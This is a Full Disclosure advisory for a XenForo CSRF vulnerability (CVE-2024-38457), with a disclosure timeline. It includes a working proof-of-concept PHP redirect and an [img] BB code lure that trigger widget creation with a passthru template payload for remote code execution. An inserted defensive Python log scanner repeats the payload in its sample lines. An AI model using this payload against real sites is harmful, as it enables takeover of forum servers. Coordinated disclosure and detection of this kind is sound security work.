Message-ID: <CAJeQoQdiNSqh_ROuSgYbGi1KHME0z6AQR=PmMMGY8GLZoGb__Q@mail.gmail.com>
Date: Tue, 16 Jul 2024 15:58:13 +0200
From: Egidio Romano <n0b0d13s@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability

-------------------------------------------------------------------------------
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
-------------------------------------------------------------------------------


[-] Software Link:

https://xenforo.com


[-] Affected Versions:

Version 2.2.15 and prior versions.


[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined in the
/src/XF/Admin/Controller/Widget.php script, does not check whether the
current HTTP request is a POST or a GET before saving a widget.
XenForo performs anti-CSRF checks for POST requests only, so this
method can be abused in a Cross-Site Request Forgery (CSRF) attack to
create or modify arbitrary XenForo widgets via GET requests. This can
also be exploited in tandem with KIS-2024-06 to perform CSRF-based
Remote Code Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, so this vulnerability
could also be exploited through "Stored CSRF" attacks by abusing the
[img] BB code tag, i.e. by creating a thread or a private message (to
be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website
could be something like this:

<?php

$url = "https://victim.website/xenforo/";

header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");

?>

Successful exploitation of this vulnerability requires a victim user
with permissions to administer styles or widgets to be currently
logged into the Admin Control Panel.
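For defenders, here is an added example (not part of the advisory or of XenForo) that scans web-server access logs for the GET-based abuse of the admin widget save route described above. The log lines are constructed samples; the Apache combined log format, the /xenforo/ install path and the IP addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jul/2024:10:02:11 +0000] "GET /xenforo/admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]=%7B%7B%24xf.app%7D%7D HTTP/1.1" 303 0 "https://attacker.example/" "Mozilla/5.0"
203.0.113.5 - - [16/Jul/2024:10:02:12 +0000] "POST /xenforo/admin.php?widgets/save HTTP/1.1" 303 0 "https://forum.example/xenforo/admin.php?widgets/add" "Mozilla/5.0"
198.51.100.7 - - [16/Jul/2024:10:03:01 +0000] "GET /xenforo/admin.php?widgets/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Admin routes that change state; the advisory names widgets/save (extend as needed).
STATE_CHANGING_ROUTES = {"widgets/save"}


def parse_line(line):
    """Split one access-log line into fields plus the XenForo route and query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["script"] = parts.path.rsplit("/", 1)[-1]
    # XenForo puts the route first in the query string: admin.php?widgets/save&key=value
    rec["route"] = parts.query.split("&", 1)[0]
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return a reason string if the request matches the GET-reachable widget save, else None."""
    if rec["script"] != "admin.php" or rec["route"] not in STATE_CHANGING_ROUTES:
        return None
    if rec["method"] != "GET":
        return None  # POSTs are covered by XenForo's anti-CSRF token check
    reasons = ["state-changing admin route reached via GET"]
    template = rec["params"].get("options[template]", [""])[0]
    if "{{" in template:
        reasons.append("template option carries template syntax (KIS-2024-06 chain)")
    return "; ".join(reasons)


def scan(log_text):
    """Return one finding per suspicious line, with source IP, timestamp and referer."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec)
        if reason:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "referer": rec["referer"], "reason": reason})
    return findings
```

Run `scan()` over the real access log; the referer of each finding shows which third-party page issued the request.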


[-] Solution:

Update to a fixed version or apply the vendor patches.


[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure
[05/06/2024] - Vendor released patches and fixed versions
[14/06/2024] - CVE identifier requested
[16/06/2024] - CVE identifier assigned
[16/07/2024] - Coordinated public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2024-38457 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Other References:

https://xenforo.com/community/threads/222133
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/


[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05